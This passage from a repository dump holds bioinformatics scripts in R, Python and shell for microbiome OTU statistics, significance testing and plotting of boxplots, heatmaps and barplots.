"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "for file in shell_dir/*\ndo \n\tif test -d $file\n\tthen\n\t\tcd $file \n\t\tfor script in ${file}/*sh\n\t\tdo\n\t\t\tqsub -cwd -l vf=XG,p=1 -P XXX -q xx.q $script\n\t\tdone\n\tfi\ndone\n"
},
{
"alpha_fraction": 0.5680453777313232,
"alphanum_fraction": 0.6470980644226074,
"avg_line_length": 53.490909576416016,
"blob_id": "e2ed093b1c6afb3e999107326a4ce97e4dd5839b",
"content_id": "bf055f7ed30c49c662daf0b41c239f6ae0a509bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3206,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 55,
"path": "/rat/diff/top.30.genus.significant_species.boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\nlibrary(\"reshape2\",lib.loc=\"R-3.4.1/library\")\nlibrary(\"ggplot2\",lib.loc=\"R-3.4.1/library\")\ndata <- read.table(\"top.30.genus.log.txt.tt.boxplot.txt\",header=T,check.name=F,sep=\"\\t\")\ndata1 <- melt(data)\ndata1$group <- factor(data1$group,levels=c(\"Healthy\",\"SCAD\",\"UA\",\"MI\"))\ncolor <- c(\"#4daf4a\",\"#377eb8\",\"#984ea3\",\"#e41a1c\")\nfont_color <- c(\"#e41a1c\",\"#4daf4a\",\"#984ea3\",\"#000000\",\"#e41a1c\",\"#000000\",\"#4daf4a\",\"#4daf4a\",\"#000000\",\"#4daf4a\",\"#000000\",\"#4daf4a\",\"#4daf4a\",\"#fbb4ae\",\"#4daf4a\",\"#377eb8\",\"#000000\",\"#000000\",\"#000000\",\"#000000\",\"#4daf4a\",\"#000000\",\"#000000\",\"#ccebc5\",\"#e41a1c\",\"#000000\",\"#000000\",\"#4daf4a\",\"#000000\",\"#000000\")\nplot = ggplot(data1, aes(x=variable, y = value, color = group)) + \n\tstat_boxplot(geom=\"errorbar\",size=0.5, width=0.5, position=position_dodge(0.8))+\t\n\tgeom_boxplot(outlier.shape = 21, fatten=0.8,size=0.5,outlier.size=0.3,position=position_dodge(0.8)) + \n\tscale_color_manual(values= color) + \n\tlabs(y=expression(Relative~abundance~(log[\"10\"])),x=\"\",fill=\"\",color=\"\") + \n\ttheme(axis.text.x = element_text(colour=font_color,size=12,face=\"italic\", hjust=1,angle=45),\n\t\taxis.text.y = element_text(colour=\"black\",size=10),\n\t\taxis.line = element_line(color=\"black\",size=0.5),\n\t\taxis.ticks = element_line(color=\"black\",size=0.5),\n\t\tlegend.position=c(0,0),\n\t\tlegend.justification=c(0,0),\n\t\tlegend.key = element_blank(),\n\t\tlegend.text = element_text(size=10),\n\t\tlegend.background = element_blank(),\n\t\tlegend.key.width = unit(0.15, \"in\"),\n\t\tlegend.key.height = unit(0.15, \"in\"),\n\t\tpanel.background = element_blank(),\n\t\tplot.margin = unit(c(0.1, 0.1, 0.1, 0.15), \"in\")\n)\n\n# 加差异显著的 * 或者 **, 目前只支持pvalue 的 0.05 和 0.01, 后边按需修改就好, 利用下边的这段代码,其实可以对任意差异检验的的结果进行显著性标注,只要有上边的箱线图文件和下边的差异检验结果文件\nlibrary(dplyr)\ndiff_result = \"Healthy-SCAD-UA-MI.Healthy-SCAD-UA-MI.kruskal.test.xls\" # 需要改成外参\nx_order = levels(data1$variable)\ngroup_order = c(\"Healthy\",\"SCAD\",\"UA\",\"MI\") # 改成外参\ncolor_order = c(\"#4daf4a\",\"#377eb8\",\"#984ea3\",\"#e41a1c\") #改成外参数,颜色需要和组别对应\ndf = read.table(diff_result, header=T, sep=\"\\t\", check.names = F)\ndiffID_sig = filter(df, pvalue < 0.01)$ID\ndiffID = filter(df, pvalue > 0.01 & pvalue < 0.05)$ID\ndiff_x = c()\nannotate_color = c() \nfor (i in 1:length(diffID)) {\n if ( diffID[i] %in% x_order) {\n diff_x = c(diff_x,(which(x_order == diffID[i])))\n\t\t\tannotate_color = c(annotate_color,color_order[which(group_order == filter(df, ID == diffID[i])$enriched)])\n }\n}\ndiff_sig_x = c()\nannotate_sig_color = c()\nfor (i in 1:length(diffID_sig)) {\n if ( diffID_sig[i] %in% x_order) {\n diff_sig_x = c(diff_sig_x,(which(x_order == diffID_sig[i])))\n\t\t\tannotate_sig_color = c(annotate_sig_color,color_order[which(group_order == filter(df, ID == diffID_sig[i])$enriched)])\n }\n}\npdf(\"./top.30.genus.log.txt.tt.boxplot.txt.pdf\",width=8,height=4,onefile=F)\nplot + annotate('text', x = diff_x, y = 0, label='*', color = annotate_color, size = 5) + annotate('text', x = diff_sig_x, y = 0, label='**', color = annotate_sig_color, size = 5)\ndev.off()\n"
},
{
"alpha_fraction": 0.6453407406806946,
"alphanum_fraction": 0.6641167998313904,
"avg_line_length": 68.90243530273438,
"blob_id": "1e344b90410f532b9953e504b489c56bd982385a",
"content_id": "2207c5035d72f59972341ccbcd353386e4c48aab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3466,
"license_type": "no_license",
"max_line_length": 417,
"num_lines": 41,
"path": "/Temp/zscore_heatmap_pstar.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "##绘制 zscore 的热图,并且用星星表示显著性差异,使用的数据是已经发表的文章的数据,涉及的文件我会放到同级的 Data 的目录下;\n#蔡军门水平 zscore\nlibrary('ComplexHeatmap')\nlibrary(png)\n#这个输入文件需要提前处理好,根据丰度文件\ndt = read.table(\"CJ_zscore_phylum.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = F, row.names=1)\n\n#读取注释文件,这个文件也是需要提前处理好,用来表示显著性差异的\ntemp = read.table('CJ_phylum_annotation_col.txt', sep = \"\\t\", header = TRUE, row.names = 1, comment.char = \"\", check.names = F)\n\n#首先画热图,需要得到聚类的顺序\np = Heatmap(dt,rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey60\"), cluster_rows = F, cluster_columns = T,show_row_names = T)\ntemp_anno = temp[colnames(dt)[column_order(p)],]\n\n#注释文件的图片路径,这个脚本实际上是把星星的图片,绘制在了热图下边,所以需要提供图片文件,在 Data 目录下。类推的话,如果想画其他图片也是可以的,\np_png = \"Data/218-star-full.png\"\nlessp_png = \"Data/leessp.png\"\nno_sig_png = \"Data/no_sig.png\"\n\n#将注释文件的字符串转变为变量\nControl_vs_CHD = as.character(lapply(as.character(temp_anno$`Control vs CHD`), function(x) eval(parse(text = x))))\nControl_vs_STEMI = as.character(lapply(as.character(temp_anno$`Control vs STEMI`), function(x) eval(parse(text = x))))\nCHD_vs_STEMI = as.character(lapply(as.character(temp_anno$`CHD vs STEMI`), function(x) eval(parse(text = x))))\n\n#生成热图的注释\nha = HeatmapAnnotation(\n \"Control vs CHD\" = anno_image(Control_vs_CHD, border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n \"Control vs STEMI\" = anno_image(Control_vs_STEMI,border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n \"CHD vs STEMI\" = anno_image(CHD_vs_STEMI,border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n annotation_name_gp = gpar(fontsize = 20) # 调节大小\n ## 上边是门水平的脚本,如果画属或者种的话,需要调节图片的参数\n #\"NCA vs sCAD\" = anno_image(NCA_vs_sCAD, border = F, height = unit(4,\"mm\"), space = unit(4, \"mm\")), #需要通过调节参数控制图片大小\n #\"NCA vs AMI\" = anno_image(NCA_vs_AMI,border = F,height = unit(4,\"mm\"),space = unit(4, \"mm\")), \n #\"sCAD vs AMI\" = anno_image(sCAD_vs_AMI,border = F,height = unit(4,\"mm\"), space = unit(4, \"mm\"))\n)\n\npdf(\"phylum_heatmap.pdf\", height = 8, width =8)\nHeatmap(dt, color = c(\"navy\", \"white\", \"firebrick3\"), rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey50\"), cluster_rows = F, cluster_columns = T,show_row_names = T, bottom_annotation = ha, width = unit(2*ncol(dt), \"cm\"), height = unit(2*nrow(dt), \"cm\"), row_names_gp = gpar(fontsize = 20), column_names_gp = gpar(fontsize = 20))\n##这个也是,有时候需要调节 cell ,字体大小什么的,不同水平的都要针对性的调整\n#Heatmap(dt, color = c(\"navy\", \"white\", \"firebrick3\"), rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey50\"), cluster_rows = F, cluster_columns = T,show_row_names = T, bottom_annotation = ha, width = unit(4*ncol(dt), \"mm\"), height = unit(4*nrow(dt), \"mm\"), row_names_gp = gpar(fontsize = 10), column_names_gp = gpar(fontsize = 10), heatmap_height = 10, heatmap_width = 10)\ndev.off() \n"
},
{
"alpha_fraction": 0.6609397530555725,
"alphanum_fraction": 0.6660158634185791,
"avg_line_length": 39.43684387207031,
"blob_id": "97449ae535058f17a9d63439d8cf2c49be873a9c",
"content_id": "f300ce0c9af9ae7a2fbefe6f5ad0930392c92c52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7683,
"license_type": "no_license",
"max_line_length": 292,
"num_lines": 190,
"path": "/16S/core_OTU.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nimport pandas as pd\nimport rpy2.robjects as robjects\nimport numpy as np\nfrom itertools import combinations\nfrom collections import defaultdict\nimport argparse,os,math\n\nparser = argparse.ArgumentParser(\n\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\tdescription='''\n-------------------\nSimple Introduction:\nGenerate the core OTU results.\nExample: python3 core_OTU.py -i filter_OTU_shared_final.xls -g plant.bms.txt.all.new.name -s SubGroup3 -p SubGroup1 -o outdir\nTo be continued.\n------------------'''\n)\n\nparser.add_argument('-i','--Input', help = \"the OTU abundance file, eg filter_OTU_shared_final.xls.\")\nparser.add_argument('-g','--group', help = \"the group file,eg plant.bms.txt.all.new.name.\")\nparser.add_argument('-s','--sample', help = \"the column name of sample ID line,eg SubGroup3.\")\nparser.add_argument('-p','--groupname', help = \"the column name of group name for analysis,eg SubGroup1.\")\nparser.add_argument('-t','--threshold', help = \"threshold for core OTU, default is 0.8.\", type = float, nargs = \"?\")\nparser.add_argument('-o','--outdir', help = \"the output directory\", nargs = \"?\")\nargs=parser.parse_args()\n\n(otu_file, group_file, sample_ID, group_par) = (args.Input, args.group, args.sample ,args.groupname)\n\npar = [otu_file, group_file, sample_ID, group_par]\nif not all(par):\n\t\tparser.print_help()\n\t\texit()\n\nthreshold = args.threshold if args.threshold else 0.8\noutdir = args.outdir if args.outdir else './'\nif not os.path.exists(outdir):\n\tos.mkdir(outdir)\n\n# merge OTU table for samples with repeat\ndef merge_otu(group_file, otu_file, sample_ID, outdir):\n\tsample = dict()\n\twith open(group_file, 'r') as IN:\n\t\tgroup_header = IN.readline().strip('\\n').split('\\t')\n\t\tsampleID_index = group_header.index(sample_ID)\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\tsample[lst[0]] = lst[sampleID_index]\n\twith open(otu_file, 'r') as IN, open(outdir + '/merge_OTU_profile.txt', 'w') as out:\n\t\totu_header = IN.readline().strip('\\n').split('\\t')\n\t\tsample[otu_header[0]] = otu_header[0]\n\t\tnew_header = [sample[x] for x in otu_header if x in sample]\n\t\tRemove_duplicates = list(set(new_header))\n\t\tRemove_duplicates.remove(new_header[0])\n\t\tout_header = otu_header[0] + '\\t' + '\\t'.join([str(x) for x in sorted(Remove_duplicates)]) ##import of sort\n\t\tprint(out_header, file=out)\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\toutID = lst[0]\n\t\t\tzeroINsample = list()\n\t\t\tcounts = defaultdict(float) # value will initialize to 0\n\t\t\tsum = defaultdict(float)\n\t\t\tmean_OTU = dict()\n\t\t\tfor x in range(1,len(lst)):\n\t\t\t\tif lst[x] == '0':\n\t\t\t\t\tzeroINsample.append(new_header[x])\n\t\t\t\tcounts[new_header[x]] += 1\n\t\t\t\tsum[new_header[x]] += float(lst[x])\n\t\t\tequal = out_header.split('\\t')\n\t\t\tequal.remove(new_header[0])\n\t\t\tif equal != sorted(counts.keys()):\n\t\t\t\tprint('Something wrong! 
Please contact me~')\n\t\t\t\texit()\n\t\t\tfor key in sorted(counts.keys()): #here to be sort for consistent\n\t\t\t\tif key not in zeroINsample:\n\t\t\t\t\tmean = sum[key]/counts[key]\n\t\t\t\t\tmean_OTU[key] = mean\n\t\t\t\telse:\n\t\t\t\t\tmean_OTU[key] = 0\n\t\t\tout_list = list()\n\t\t\tfor key in sorted(mean_OTU.keys()):\n\t\t\t\tout_list.append(mean_OTU[key])\n\t\t\tout_line = outID + '\\t' + '\\t'.join([str(x) for x in out_list])\n\t\t\tprint(out_line, file=out)\n\tprint(\"Generate merged OTU table: \" + \"merge_OTU_profile.txt\")\n\n# common otu table\ndef common_OTU(group_par, sample_ID, threshold, outdir):\n\tcommon_OTU_list = list()\n\tall_groups = group[group_par].unique()\n\tfor item in all_groups:\n\t\tlst = group.loc[group[group_par] == item,:][sample_ID].unique()\n\t\tsub_dt = dt[lst]\n\t\tsample_num = sub_dt.shape[1]\n\t\tthreshold = sample_num*threshold\n\t\tthreshold_num = sample_num*threshold\n\t\ttemp_OTU = sub_dt[(sub_dt != 0).sum(axis = 1) > threshold_num]\n\t\ttemp_OTU_dt = sub_dt.loc[temp_OTU.index,:]\n\t\ttemp_OTU_dt.to_csv(outdir + '/' + item + '_commonOTU.xls', sep ='\\t')\n\t\tprint(\"Generating the common OTU file: \" + item + \"_commonOTU.xls\")\n\t\tcommon_OTU_list = list(temp_OTU.index) + common_OTU_list\n\tfinal_OTU = list(set(common_OTU_list))\n\tcommon_OTU_dt = dt.loc[final_OTU,:]\n\toutfile = '_'.join(all_groups) + '_commonOTU.xls'\n\tcommon_OTU_dt.to_csv(outdir + '/' + outfile, sep ='\\t')\n\tprint(\"Generating the common OTU file: \" + outfile)\n\n# stat the each two group core OTU\ndef core_otu(compare_group, group_par, sample_ID, common_OTU, outdir):\n\tcommon_OTU_dt = pd.read_table(common_OTU, index_col=0, sep = '\\t')\n\t#(compare_group, group_par, sample_ID) = (group_info, group_par, sample_ID)\n\tformer_group = compare_group[0]\n\tlatter_group = compare_group[1]\n\thead = ['otuID', 'mean(' + former_group + ')', 'sd(' + former_group + ')', 'mean-rank(' + former_group + ')', 'occ-rate(' + former_group + ')','mean(' + latter_group + ')', 'sd(' + latter_group + ')', 'mean-rank(' + latter_group + ')', 'occ-rate(' + latter_group + ')', 'enrcihed', 'pvalue']\n\tout_header = '\\t'.join(head)\n\tout = open('_'.join(compare_group) + '_temp_diff.xls', 'w')\n\tprint(out_header, file = out)\n\tfor otu in common_OTU_dt.index:\n\t\tformer_lst = group.loc[group[group_par] == former_group,:][sample_ID].unique()\n\t\tlatter_lst = group.loc[group[group_par] == latter_group,:][sample_ID].unique()\n\t\tformer_abd = common_OTU_dt.loc[otu][former_lst]\n\t\tlatter_abd = common_OTU_dt.loc[otu][latter_lst]\n\n\t#calcultate mean\n\t\tformer_mean = former_abd.mean()\n\t\tlatter_mean = latter_abd.mean()\n\n\t#calculate sd\n\t\tformer_sd = former_abd.std()\n\t\tlatter_sd = latter_abd.std()\n\n\t# calculate occurrence\n\t\tformer_occ = (former_abd != 0).sum()/len(former_abd)\n\t\tlatter_occ = (latter_abd != 0).sum()/len(latter_abd)\n\n\t# calculate rank for enrich\n\t\trank = robjects.r['rank']\n\t\ttwo_lst = list(common_OTU_dt.loc[otu][list(former_lst) + list(latter_lst)])\n\t\tRank = list(np.array(rank(robjects.FloatVector(two_lst))))\n\t\tformer_rank = Rank[:len(list(former_lst))]\n\t\tlatter_rank = Rank[len(list(former_lst)):]\n\t\tformer_rank_mean = np.mean(former_rank)\n\t\tlatter_rank_mean = np.mean(latter_rank)\n\t\tif former_rank_mean > latter_rank_mean:\n\t\t\tenrich = former_group\n\t\telif former_rank_mean < latter_rank_mean:\n\t\t\tenrich = latter_group\n\t\telse:\n\t\t\tenrich = 'None'\n\n\t# calculate the pvalue\n\t\tformer_vector = 
robjects.FloatVector(list(former_abd))\n\t\tlatter_vector = robjects.FloatVector(list(latter_abd))\n\t\twilcox = robjects.r['wilcox.test']\n\t\tpvalue = np.array(wilcox(former_vector,latter_vector)[2])[0]\n\t\tif not math.isnan(pvalue):\n\t\t\tline = [otu,former_mean, former_sd, former_rank_mean, former_occ, latter_mean, latter_sd, latter_rank_mean, latter_occ, enrich, pvalue]\n\t\t\tline = [str(x) for x in line]\n\t\t\tout_line = '\\t'.join(line)\n\t\t\tprint(out_line, file = out)\n\tout.close()\n\n\t# calculate the q value\n\tdt_pvalue = pd.read_table('_'.join(compare_group) + '_temp_diff.xls', sep='\\t', index_col=0)\n\tp_adjuste = robjects.r('p.adjust')\n\tqvalue = p_adjuste(robjects.FloatVector(list(dt_pvalue['pvalue'])))\n\tdt_pvalue['qvalue'] = qvalue\n\toutfile = '_'.join(compare_group) + '_diff.xls'\n\tdt_pvalue.to_csv(outdir + '/' + outfile, sep='\\t')\n\tos.remove('_'.join(compare_group) + '_temp_diff.xls')\n\tprint(\"Generate the final results: \" + outfile)\n\n# process the otu table\nmerge_otu(group_file, otu_file, sample_ID, outdir)\n\n# common OTU\ndt = pd.read_table(outdir + '/merge_OTU_profile.txt', header = 0, index_col = 0, sep = '\\t')\ngroup = pd.read_table(group_file, header = 0, index_col = 0, sep = '\\t')\ngroup_par = group_par\nsample_ID = sample_ID\nthreshold = float(threshold)\n\nall_groups = group[group_par].unique()\ncommon_OTU(group_par, sample_ID, threshold, outdir)\ncommon_OTU_file = outdir + '/' + '_'.join(all_groups) + '_commonOTU.xls'\n\n# core OTU\nfor compare_group in combinations(all_groups, 2):\n\tcore_otu(compare_group,group_par, sample_ID, common_OTU_file, outdir)\n"
},
{
"alpha_fraction": 0.6242263317108154,
"alphanum_fraction": 0.6268788576126099,
"avg_line_length": 40.88888931274414,
"blob_id": "0cce982f0e8522cc94df1a0f1d2376410ec9cde0",
"content_id": "23c08e3fa80f02ac7823d0e77e5eccfa9b526590",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 27,
"path": "/multiple_liner.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# /usr/bin/Rscript\n#数据在本地,利用多元线性回归校正混在因子,得出相应的 P 值,待完善....\ndt = read.table('SamplingTime_BMI_gout.tsv', header = T)\nend = length(colnames(dt))\npara = c(\"SamplingTime\",\"BMI\")\noutfile = paste(c(para,\"lm.txt\"), collapse=\"_\")\nhead = \"Tax\\tFactor\\tEstimate\\tStd. Error\\tt value\\tP_value\"\ncat(head, file=outfile, sep=\"\\n\")\nstart = length(para) + 2\nfor(i in start:end){\n tax = colnames(dt)[i]\n temp_rowname = c(para,tax)\n temp_dt = dt[temp_rowname]\n run = paste(\"model = lm(\", tax, \" ~., data=temp_dt)\", sep=\"\")\n eval(parse(text = run)) #再一次用到了将变量转化为表达式的问题。。。特别容易忘记啊...\n dt_p = as.data.frame(summary(model)$coefficient)\n dt_res = dt_p[-1,] # 去掉截距,感觉暂时用不到,其他元素保留输出\n colnames(dt_res)[length(colnames(dt_res))] = 'P_value'\n part_head = paste(colnames(dt_res),collapse = \"\\t\") # 连接向量\n #head = paste('Tax\\tFactor',part_head, sep=\"\\t\")\n for(i in(1:length(rownames(dt_res)))){\n sub_line = paste(dt_res[rownames(dt_res)[i],], collapse=\"\\t\")\n line = paste(tax,rownames(dt_res)[i], sub_line,sep=\"\\t\")\n cat(line, file = outfile, sep=\"\\n\", append=T)\n }\n}\n# 先处理成这样子吧,后续的按照表型因子分开以及 P 值的校正,后边再处理\n"
},
{
"alpha_fraction": 0.6838235259056091,
"alphanum_fraction": 0.7156862616539001,
"avg_line_length": 31.639999389648438,
"blob_id": "595122961faf770c5a06d59e9f5ca67c7c123f02",
"content_id": "204d4780f0714b0ec9839c8ce955531106e044d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 25,
"path": "/Anosim.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(ggplot2)\nlibrary(vegan)\ndata(iris)\ndt = subset(iris, select = -Species)\niris.dist = vegdist(dt)\nm = monoMDS(iris.dist)\ndat = as.data.frame(m$points)\ndat$group = iris$Species\nggplot(dat, aes(MDS1,MDS2, col=group, shape=group)) + geom_point() +\n theme(\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"))\niris.anno = anosim(iris.dist, iris$Species, permutations = 999)\niris.anno\n#Call:\n#anosim(x = iris.dist, grouping = iris$Species, permutations = 999) \n#Dissimilarity: bray \n\n#ANOSIM statistic R: 0.8576 R=0,表示组间没有差异,说明实验组和对照组之间没有差异;R> 0,表示组间差异大于组内差异,说明实验组和对照组之间存在差异\n# Significance: 0.001 当然,如果我们得出R值大于0, 还不足以说明实验组和对照组之间存在差异,我们还缺少一个p值,此时常用的检验方法是Permutation Test (置换检验)\n\n#Permutation: free\n#Number of permutations: 999\n\nplot(iris.anno)\n"
},
{
"alpha_fraction": 0.6571428775787354,
"alphanum_fraction": 0.6571428775787354,
"avg_line_length": 7.75,
"blob_id": "694f3d415324f4898d85bf20aa6e709a7712a76b",
"content_id": "5dffdd46f2a7117f6e6028cadca55df81a58d3f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/Temp/Data/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "### 这里是不知道写什么的标题\n\n*** \n这里需要放一些输入文件\n"
},
{
"alpha_fraction": 0.5951626896858215,
"alphanum_fraction": 0.634321928024292,
"avg_line_length": 41.87654495239258,
"blob_id": "316d3b8f67b4e149c0327353d5417088c0674d12",
"content_id": "a4d73c006217249387825adef13986010c1da714",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3639,
"license_type": "no_license",
"max_line_length": 302,
"num_lines": 81,
"path": "/16S/group_barplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/Rscript\n############################################################\n# 画 barplot 的时候加上分组信息;加了 R 的外参;\n# usage: Rscript temp.R -i barplot.txt -t Otu9:Otu21:Otu25:Otu20:Otu30:Otu387:Otu34:Otu96:Otu111:Otu45:Otu420:Otu250:Otu63:Otu91:Otu148:Otu391:Otu367 -r r:y:rj:yj:zzd:zzs -c 3e523b:cca18d:8accc0:6f94bc:432c4f:763c32:ca94c7:69843d:77d28c:bf4579:6555ae:c98a39:d0d155:d34c3d:cb4cc3:75d549:7040cb -p prefix\n# 如示例所示:需要配置排序后的 OTU 和 色值,提供色值的网站可以在这里找: http://tools.medialab.sciences-po.fr/iwanthue/,程序稍微处理下就可以用了\n############################################################\n\nlibrary(ggplot2)\nlibrary(grid)\nlibrary(dplyr)\nlibrary(getopt)\nargs <- commandArgs(trailingOnly = FALSE)\nprogram <- sub(\"--file=\", \"\", args[grep(\"--file=\", args)])\n\n#SCRIPTPATH <- dirname(program)\n#source(paste(SCRIPTPATH,'/ggplot2_themes.R',sep=''))\n#source('./ggplot2_themes.R')\n\nspec <- matrix(c(\n 'help','h',0,'logical','',\n 'barplot.txt','i',1,'character','input YL OTU per table',\n 'legendID','t',1,'character','the legend ID in order (tax or otu), separated by colon',\n 'group_name','r',1,'character','the group names in order, separated by colon',\n 'colorID','c',2,'character', 'the color set for plot, separated by colon',\n 'prefix','p',1,'character', 'the prefix for output file',\n 'outdir','o',2,'character','output dir',\n 'log','l',2,'character','log file'\n),ncol=5,byrow=TRUE)\nopt <- getopt(spec)\n#cat(getopt(spec, usage=TRUE))\n\n# if help was asked for print a friendly message\n# and exit with a non-zero error code\nif( !is.null(opt$help)) {\n cat(getopt(spec, usage=TRUE));\n q(status=1);\n}\n\nif( is.null(opt$outdir) ) { opt$outdir <- './'}\nif( is.null(opt$frequency)) {opt$frequency <- 0.8}\nif( is.null(opt$log)) {opt$log <- 'log.txt'}\n\nSys.setenv(TZ=\"Asia/Shanghai\")\n#Sys.getenv(\"TZ\")\ncat(\"group_barplot.R program starts at:\", format(Sys.time(), \"%a %b %d %X %Y\"),'\\n',append=TRUE,file=opt$log)\n##########\n## process input parameters\ndt <- read.table(opt$barplot.txt, header=T, sep=\"\\t\")\nlegendID <- unlist(strsplit(opt$legendID, \":\"))\ngroup_name <- unlist(strsplit(opt$group_name, \":\"))\nif( !is.null(opt$colorID) ) { colorID <- c(paste(\"#\",unlist(strsplit(opt$colorID, \":\")),sep=\"\"))}\n# 以后完善同一组内排序的问题吧..\n#if( !is.null(opt$x_order)) {\n#\tx_order <- c(paste(\"#\",unlist(strsplit(opt$x_order, \":\")),sep=\"\"))\n#\tdt$individual_order = factor(dt$individual, level=x_order)\n#}\ndt$order <- factor(dt$group, levels=group_name)\noutfile = paste(opt$prefix,'OTU.pdf', sep='_')\n\npdf(paste(opt$outdir,outfile,sep=\"/\"), width = 8, height = 6, onefile=FALSE)\n\np = ggplot(dt,aes(x=dt$individual,y=dt$abundance,fill=factor(dt$tax, levels= rev(legendID)))) +\n geom_bar(stat = \"identity\", color = \"#56666B\", size = 0.1) +\n labs(x = \"Inidividuals\", y = \"Relative Abundance\") +\n scale_fill_manual(values= colorID) + \n theme_bw() +\n theme(axis.title = element_text(size = 12),\n axis.text = element_text(colour = \"black\", size = 8),\n axis.text.x = element_text(hjust = 1,angle=65,color=\"black\"),\n legend.title = element_blank(),legend.key.size=unit(3,\"mm\"),\n legend.text=element_text(size=10)) +\n facet_wrap(~order, strip.position = \"bottom\", nrow = 1, scales=\"free_x\")\n\n#调整每组的距离,\ngt = ggplotGrob(p)\nN<- dt%>% group_by(order)%>% summarise(count = length(unique(individual)))\npanelI <- gt$layout$l[grepl(\"panel\", gt$layout$name)]\ngt$widths[panelI] <- unit(N$count, \"null\")\ngrid.newpage()\ngrid.draw(gt)\ndev.off()\n"
},
{
"alpha_fraction": 0.5777980089187622,
"alphanum_fraction": 0.5932666063308716,
"avg_line_length": 33.34375,
"blob_id": "ea0c2a93fa10c36541f2cc5ee33b4dd75a66b3b6",
"content_id": "cd0be95b5d522cea7da04d48719da0f215a8409f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1329,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/CHD/bray_curtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## beta 多样性矩阵文件处理, 输出用于画箱线图的组内和组间的距离文件\nimport pandas as pd\ndt = pd.read_table('braycurtis.txt', index_col = 0) #距离矩阵文件\ngroup = pd.read_table('info.xls', index_col=0) #表型文件\ngroup_dict = group['Group'].to_dict() #生成样品-组名的字典\n\n##两两样品名作为键,距离值作为值,生成字典..\ndistance = dict()\nfor Id1 in dt.columns:\n for Id2 in dt.columns:\n key = Id1 + ':' + Id2\n key_temp = Id2 + ':' + Id1\n value = dt.loc[Id1,Id2]\n if (key in distance) or (key_temp in distance): # 判断是否有重复的\n continue\n else:\n distance[key] = value\n \nout = open('intra_distance.txt','w') # 生成画 boxplot 的文件\nprint('individuals\\tdistance\\tgroup', file=out)\nn = 0\nfor key in distance:\n key_split = key.split(':')\n if key_split[0] == key_split[1]: #如果是同一个体, 则跳过;\n n = n +1\n continue\n if group_dict[key_split[0]] == group_dict[key_split[1]]: #判断是否同组,\n print('\\t'.join([key, str(distance[key]), group_dict[key_split[0]]]), file=out)\n else:\n print('\\t'.join([key, str(distance[key]), 'sCAD-AMI']), file=out) #否的话,输出组间样品距离的值\n#print(n) #测试用\nout.close()\n"
},
{
"alpha_fraction": 0.6481304168701172,
"alphanum_fraction": 0.6586769223213196,
"avg_line_length": 46.40909194946289,
"blob_id": "21a5599d9a99ca9239f73abdcf0804e8f4a786bb",
"content_id": "bb5b5bfa7a1b5c278bfd401177c5eed2bcefe591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1217,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 22,
"path": "/CHD/combine_barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#对于任一指定水平生成按照分组对物种丰度取均值的文件,用于画合并的 barpolot 图,同时输出了物种的顺序, 输入文件在 Data 目录下\nabd = pd.read_table('CJ_phylum_abd.txt', index_col=0)\nabd = abd.drop('Tax_detail', axis=1) #我们的文件需要注释掉这一行\ngroup = pd.read_table('CJ_phylum_map.txt', index_col=0)\nsample_group = group.to_dict()\ngroups = list(group['Description'].unique())\ndt_list = list()\nfor item in groups:\n dt = abd[[x for x in abd.columns if sample_group['Description'][x] == item]].mean(axis=1).to_frame(name='Mean')\n large = dt.loc[dt['Mean'] > 0.01] # 这里是合并低丰度物种,阈值要根据实际情况调整...\n small = dt.loc[dt['Mean'] <= 0.01]\n small_merge = small.sum().to_frame(name = 'Others').T\n dt_merge = pd.concat([large,small_merge])\n dt_merge['Group'] = item\n dt_list.append(dt_merge)\nbar_dt = pd.concat(dt_list)\nbar_dt['Tax'] = bar_dt.index\nbar_dt = bar_dt[['Tax', 'Mean', 'Group']]\nbar_dt.to_csv('test.txt', index=0, sep='\\t')\ntax_order = 